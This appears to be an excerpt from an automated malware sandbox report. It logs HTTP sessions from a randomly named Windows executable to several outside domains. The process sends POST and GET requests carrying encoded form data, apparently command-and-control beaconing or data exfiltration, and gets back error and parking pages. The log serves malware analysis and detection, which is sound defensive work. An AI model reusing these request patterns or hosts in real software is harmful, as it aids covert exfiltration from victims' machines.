                                                                            Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
                                                                            Dec 10, 2024 16:24:47.196110964 CET1236INData Raw: 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 35 22 20 68 72 65
                                                                            Data Ascii: uration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
                                                                            Dec 10, 2024 16:24:47.198530912 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61
                                                                            Data Ascii: patch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpac
                                                                            Dec 10, 2024 16:24:47.198549032 CET1236INData Raw: 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72
                                                                            Data Ascii: e-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16
                                                                            Dec 10, 2024 16:24:47.200855017 CET1236INData Raw: 65 20 3d 20 74 61 72 67 65 74 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 61 6e 67 65 20 74 68 65 20 65 78 74 72 61 63 74 65 64 20 73 6f 75 72 63 65 20 63 6f 64 65 0a 20 20 20 20 20 20 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61
                                                                            Data Ascii: e = target; // Change the extracted source code changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (current
                                                                            Dec 10, 2024 16:24:47.313241959 CET1236INData Raw: 20 20 3c 74 62 6f 64 79 20 63 6c 61 73 73 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 20 69 64 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 3c 74 62 6f 64 79 3e 0a 20 20 20 20 3c 74 72 20 63 6c
                                                                            Data Ascii: <tbody class='fuzzy_matches' id='fuzzy_matches'> </tbody> <tbody> <tr class='route_row' data-helper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-pat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49917 | 216.40.34.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:48.716372013 CET | 817 | OUT | POST /f83s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.newhopetoday.app
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.newhopetoday.app
                                                                            Referer: http://www.newhopetoday.app/f83s/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=Yg2q5oZ/ZoKoefuyv0pkt319p6sdgGIUrCY0XMrNb75oMBuZvaji4i8oQvb8Ir6WTHizDqUVp62OD4rU413XIoZMbsnJkbRVG4yH+rVzLwlhEWX3zYdfkE4SnqZIiWoauCXtqpi2xn5zLHxXKhEf12+fqRcTQhUwSF22ROGC3EmQYeC+jolY5sqK8saRVN8h/gzLkVr83UPWspiubBq82h8O2cgQ
Dec 10, 2024 16:24:49.853225946 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            content-type: text/html; charset=UTF-8
                                                                            x-request-id: b48f66f8-e84b-437c-80bf-e31ef0255395
                                                                            x-runtime: 0.021908
                                                                            content-length: 17154
                                                                            connection: close
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49923 | 216.40.34.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:51.378676891 CET | 1834 | OUT | POST /f83s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.newhopetoday.app
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.newhopetoday.app
                                                                            Referer: http://www.newhopetoday.app/f83s/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:24:52.580269098 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            content-type: text/html; charset=UTF-8
                                                                            x-request-id: 5325af3b-84a0-482b-ab46-c4e2842ab007
                                                                            x-runtime: 0.021576
                                                                            content-length: 18170
                                                                            connection: close
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49934 | 216.40.34.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:24:54.044536114 CET | 536 | OUT | GET /f83s/?Pt=fDlHoNWP0RBd&UTJ0bhC=VieK6f8ncaDfGPivzEEx/UZGk95Gg2UmvQp6RJCzQOx2HiGD45aR4i1hBpXETM6WRWeDEM4UlZawI5DKshaxB7d7bPT0ms8iN9yo/alCEGhGDXP2xLsxmillvf5/o1Iesw== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.newhopetoday.app
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:24:55.166249990 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 1; mode=block
                                                                            x-content-type-options: nosniff
                                                                            x-download-options: noopen
                                                                            x-permitted-cross-domain-policies: none
                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                            content-type: text/html; charset=utf-8
                                                                            etag: W/"489b1cc03742192cd82a546616d2ba37"
                                                                            cache-control: max-age=0, private, must-revalidate
                                                                            x-request-id: b3602359-efe6-4f2f-bfc8-002e06972a23
                                                                            x-runtime: 0.005239
                                                                            transfer-encoding: chunked
                                                                            connection: close
                                                                            Data Ascii: 1759<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.2.5 | 49945 | 3.33.130.190 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:00.930907011 CET | 797 | OUT | POST /gnm5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.binacamasala.com
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.binacamasala.com
                                                                            Referer: http://www.binacamasala.com/gnm5/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=ggSfT+R16ULrq9Onvvsqs2wwQp08CuuBlWGN8hQ3mPFuf4gB3RlqdPjsRS7qud5jpMM9jffMUvm7t01+MEa1gDPvBWy8VmBYkEvtUzKMIz/DlLTCtYtGKRd/LZQT6GYs54FYnBj5YMb3fFQ3whw7HZ4Ch/jy2EAjZMp7iGex9P+uWtWGiP5kWO4zsjxQhjGGsWXXPvU=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.2.5 | 49955 | 3.33.130.190 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:03.597537041 CET | 817 | OUT | POST /gnm5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.binacamasala.com
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.binacamasala.com
                                                                            Referer: http://www.binacamasala.com/gnm5/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=ggSfT+R16ULrrd+ntMEq4mxCVp08XevIlWaN8gkdn9RuGdEB2QlqQvjsey7jk954pMRAjfjMUvi7tw5+M3C0hTPtK2y+RmBYkEvtUzPhIznDl7DCv5tFJRd+OZQT+GZl54ELnAvTYOT3fEg3w0M4Sp4Evfi4/WRaZ+hFgFbM9MmJa7ns4txMFuUL8w5nwTnv21HnR4CXwu/+/RUHqBUODkMrbt+Q
                                                                            Dec 10, 2024 16:25:04.696904898 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            19 | 192.168.2.5 | 49961 | 3.33.130.190 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:06.272141933 CET | 1834 | OUT | POST /gnm5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.binacamasala.com
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.binacamasala.com
                                                                            Referer: http://www.binacamasala.com/gnm5/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:25:07.347980976 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.2.5 | 49968 | 3.33.130.190 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:09.065984964 CET | 536 | OUT | GET /gnm5/?UTJ0bhC=ti6/QOgt3F3Nl8C8p5prtjMaW6Y6IMW9lnWD5iRmif1oLulHgQhjY9iWeVbvuaIrm8dL1NajAOuvhk5PRRHWg3CbVnS8VxpDrxjuQQLZCEWAlJrEzJ1sdVkNA6M29CxpkA==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.binacamasala.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:25:19.188924074 CET | 392 | IN | HTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Tue, 10 Dec 2024 15:25:18 GMT
                                                                            content-length: 271
                                                                            connection: close
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UTJ0bhC=ti6/QOgt3F3Nl8C8p5prtjMaW6Y6IMW9lnWD5iRmif1oLulHgQhjY9iWeVbvuaIrm8dL1NajAOuvhk5PRRHWg3CbVnS8VxpDrxjuQQLZCEWAlJrEzJ1sdVkNA6M29CxpkA==&Pt=fDlHoNWP0RBd"}</script></head></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.2.5 | 49995 | 46.38.243.234 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:24.796169043 CET | 776 | OUT | POST /zdtk/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dlion.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.dlion.net
                                                                            Referer: http://www.dlion.net/zdtk/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=PbP7NMFMIfMyn5z5n8iNHP/Eyu4miUKyq0PpgugJcf4xtR5V9X+vkcw6ckrgH0dhix2RAhV1l7/BJMdbadLVo9+roNbfnk8xsPWrxAsAXqdLtmuesUVfzdmp8YJUfJ4jMWXdvCddTKDn7ncvrOgd3QpxGHPKAIN7r4TawQPZnWIoBMFO6CxDuz0iDi41MDTuNK0LH08=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.2.5 | 49996 | 46.38.243.234 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:27.455949068 CET | 796 | OUT | POST /zdtk/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dlion.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.dlion.net
                                                                            Referer: http://www.dlion.net/zdtk/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=PbP7NMFMIfMyma75ldiNAv/FrO4m3EL7q0TpgrAjfpoxszRV8W+vhcw6XErhakd6ixqvAk11l6bBJMNbduTSut+pjtbdpE8xsPWrxEE5XqVLsWees1VAo9mu04JUOZ4nMWX/vDBjTPPn7msvraMe8Qp3JnOGEpV+ypjy5zqd6UIgE60kgg5r9TYaTxwCdzyHXpk7ZjqmRToHPg+v2sphThtdkjDO


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            23 | 192.168.2.5 | 49997 | 46.38.243.234 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:30.110182047 CET | 1813 | OUT | POST /zdtk/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dlion.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.dlion.net
                                                                            Referer: http://www.dlion.net/zdtk/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            24 | 192.168.2.5 | 49998 | 46.38.243.234 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:32.770186901 CET | 529 | OUT | GET /zdtk/?UTJ0bhC=CZnbO61oB8I0t5jp9Yjra7+H6pVn9XqOl0/1mbdze6wgsABtqXuHlKk0QinpfTYx1CmGDnkfwpenOsZSDrrPpuKT49SBu0EMo/Pb2gUHZetqgGuH1mNT0tuZ4b1AatRTdQ==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.dlion.net
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:25:40.784006119 CET | 455 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:23:20 GMT
                                                                            Server: Apache/2.4.10 (Debian)
                                                                            Content-Length: 275
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.dlion.net Port 80</address></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            25 | 192.168.2.5 | 49999 | 74.48.34.43 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:47.059088945 CET | 782 | OUT | POST /uwg4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.bioart.buzz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.bioart.buzz
                                                                            Referer: http://www.bioart.buzz/uwg4/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=IpgPCcaOMujF4CZreBtU+AIQmGxkDIRj2wqM4HpolwYdrKLBNDQJZHA3Aey9bmThCu0DQzokSjpaLyEltxZz7KbkyOtaf1Q/CQEoj5foxzey8Dor14ArE0jWMTroM8OlBwpEyXkUGVgBpRlUji/GkaMj91Hv1wtZ4cB+xL83Q6WKAK5b7RrzLVT3nJZm+4g67U07qec=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            26 | 192.168.2.5 | 50000 | 74.48.34.43 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:49.721002102 CET | 802 | OUT | POST /uwg4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.bioart.buzz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.bioart.buzz
                                                                            Referer: http://www.bioart.buzz/uwg4/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=IpgPCcaOMujF4hxrfjFUpwITsmxkaYRv2wmM4Gs1kCsdsr7BfSQJYHA3YOy4VGTmCu4hQyUkSnBaLy0lqGtw06biretYb1Q/CQEoj5aNxz2y8zYr1d0qaEjVLTrodMO5BwpmyVRxGQkBpT9Umj/FxKMpiFH4jx1X+/40s4o0NaGEB8IxhzjbY1/P3aRRvIBTh3kL0JI4ANf6JIbt31zQsYHlbENR
                                                                            Dec 10, 2024 16:25:51.230290890 CET | 796 | IN | HTTP/1.1 404 Not Found
                                                                            Server: openresty/1.19.3.1
                                                                            Date: Tue, 10 Dec 2024 15:25:51 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Cache: MISS from kangle web server
                                                                            Content-Encoding: gzip


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            27 | 192.168.2.5 | 50001 | 74.48.34.43 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:52.373214006 CET | 1819 | OUT | POST /uwg4/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.bioart.buzz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.bioart.buzz
                                                                            Referer: http://www.bioart.buzz/uwg4/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            28 | 192.168.2.5 | 50002 | 74.48.34.43 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:25:55.028652906 CET | 531 | OUT | GET /uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.bioart.buzz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
